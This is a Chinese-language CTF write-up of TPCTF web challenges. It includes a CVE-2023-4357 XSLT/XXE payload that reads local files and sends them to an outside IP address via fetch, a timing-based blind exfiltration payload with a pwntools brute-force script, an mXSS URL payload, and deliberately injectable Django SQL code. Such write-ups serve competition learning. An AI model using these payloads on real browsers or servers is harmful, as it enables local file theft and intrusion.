前言
五个Web题凑不齐一个不是XSS的,我的评价是。。。。。
写这文章的时候支原体了妈的。。没去成N1,强网拟态又和省赛重复了。日了狗了。
xssbot
CVE-2023-4357
出网带出来就行了。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
| <?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="?#"?>
<!DOCTYPE div [
<!ENTITY passwd_p "file:///flag">
<!ENTITY passwd_c SYSTEM "file:///flag">
<!ENTITY sysini_p "file:///flag">
<!ENTITY sysini_c SYSTEM "file:///flag">
]>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<xsl:copy-of select="document('')"/>
<body xmlns="http://www.w3.org/1999/xhtml">
<div style="display:none">
<p class="&passwd_p;">&passwd_c;</p>
<p class="&sysini_p;">&sysini_c;</p>
</div>
<div style="width:40rem" id="r" />
<script>
document.querySelector('#r').innerHTML = `
remote web url: <textarea style="width:100%;height:1rem">${location.href}</textarea><br/><br/>`;
document.querySelectorAll('p').forEach(p => {
//You can send p.innerHTML by POST.
document.querySelector('#r').innerHTML += `
local file path: <textarea style="width:100%;height:1rem">${ p.className }</textarea><br/>
local file content:<textarea style="width:100%;height:6rem">${ p.innerHTML }</textarea><br/><br/>`;
const apiUrl = 'http://8.130.24.188:6662?flag='+p.innerHTML;
fetch(apiUrl)
.then(response => {
if (!response.ok) {
throw new Error('Network response was not ok');
}
return response.json();
})
});
</script>
</body>
</xsl:template>
</xsl:stylesheet>
|
xssbot but no Internet
第一题的不出网版本,我的思路就是第一题基础上盲注就行了。但是盲注显得会很慢,因为一次请求需要nc一次,大概就五秒。。。但我猜flag也不会很长,就很短。
盲注带出,利用超时报错
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
| <?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="?#"?>
<!DOCTYPE div [
<!ENTITY passwd_p "file:///flag">
<!ENTITY passwd_c SYSTEM "file:///flag">
<!ENTITY sysini_p "file:///flag">
<!ENTITY sysini_c SYSTEM "file:///flag">
]>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<xsl:copy-of select="document('')"/>
<body xmlns="http://www.w3.org/1999/xhtml">
<div style="display:none">
<p class="&passwd_p;">&passwd_c;</p>
<p class="&sysini_p;">&sysini_c;</p>
</div>
<div style="width:40rem" id="r" />
<script>
const p=document.querySelector("p");
const flag=p.innerHTML.split("").map(c => c.charCodeAt(0).toString(16).padStart(2, "0")).join("");
if(flag.charAt(THEPOS)=='THEFLAG'){
while(1){}
}
</script>
</body>
</xsl:template>
</xsl:stylesheet>
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
| from pwn import *
import traceback
with open("./template.xml","r") as file:
template=file.read()
def test(flag):
io = remote("202.112.238.82",23379)
try:
io.sendline("a.xml")
xml = template.replace("THEFLAG",flag[-1]).replace("THEPOS",str(len(flag)-1))
io.sendline(xml)
io.sendline("EOF")
io.recvuntil("- Now browsing your website...")
result = io.recvuntil(["Bye bye!","ERROR"])
if b"ERROR" in result:
return True
elif b"Bye bye!" in result:
return False
else:
assert False,result
finally:
io.close()
def main():
flag = "54504354467b"
while 1:
if flag.endswith("7d"):
print(flag)
exit(0)
try:
for char in '0123456789abcdef':
local_flag = flag + char
if test(local_flag):
flag = local_flag
print(flag)
break
except KeyboardInterrupt as e:
raise
except:
traceback.print_exc()
main()
|
walk off the earth
大致的思路有2个点
- note路由进行xss
- visit路由绕过sha256比较,需要满足c5a5c0d64fab871c+???的sha256开头是7个0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
| base = 'abd3d4a91f15fbc0'
from pwn import *
import hashlib
def test(suffix):
data = base + suffix
hash_value = hashlib.sha256(data.encode()).hexdigest()
if hash_value.startswith('0000000'):
return True
else:
return False
pwnlib.util.iters.mbruteforce(test, string.digits + string.ascii_letters + string.punctuation, 8,'fixed')
|
flag在res里 并且不能被res = ByeBye! 覆盖才行
https://developer.mozilla.org/en-US/docs/Web/API/Document/DOMContentLoaded_event
domcontentloaded不会等img src但是会等script src
所以加载一个script大于2000ms会让page.goto报错
/note?text=<form>+<math><mtext>+<%2Fform><form>+<mglyph>+<style><%2Fmath><script+src%3D%27https://app.requestly.io/delay/5000/www.baidu.com%27><%2Fscript>
TPCTF{W0w_Y0u_Bl3w_Up_th3_Pr1s0n!}
graphoid
我完全看不懂。我的
walk off the solar system
我也不知道怎么进入下一个catch,我的
ezsqli
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
| from django.shortcuts import render
from django.db import connection
from django.http import HttpResponse,HttpRequest
from .models import AdminUser,Blog,QueryHelper
def index(request:HttpRequest):
return HttpResponse('Welcome to TPCTF')
def debug(request:HttpRequest):
if request.method != 'POST':
return HttpResponse('Welcome to TPCTF')
username = request.POST.get('username')
if username != 'admin':
return HttpResponse('you are not admin.')
password = request.POST.get('password')
users:AdminUser = AdminUser.objects.raw("SELECT * FROM blog_adminuser WHERE username='%s' and password ='%s'" % (username,password))
try:
assert password == users[0].password
q = QueryHelper(query="select flag from flag",debug=True,debug_sql="select sqlite_version()")
response = q.run_debug()
return HttpResponse(response)
except:
return HttpResponse('wrong password')
def search(request:HttpRequest):
try:
query_helper = QueryHelper("SELECT * FROM blog_blog WHERE id=%s",**request.GET.dict())
result = query_helper.run(Blog)[0]
return HttpResponse(result.content)
except Exception as e:
return HttpResponse('你来到了没有知识的荒原')
|
主要代码如上,2个路由,debug和search,都是用%s占位的,测试中。
search路由不存在sql注入,debug存在字符串拼贴,但无法获取到回显。尝试盲注(sqlite)
我压根不知道怎么绕你的sql注入,我的。最近看到sql就头大,所以这题我也没继续做了。。。。
总结
这次比赛出的题,我觉得xssbot和walk off the earth 四件套出的还行,但是其他2个就有点,有点,有点让我觉得,怪!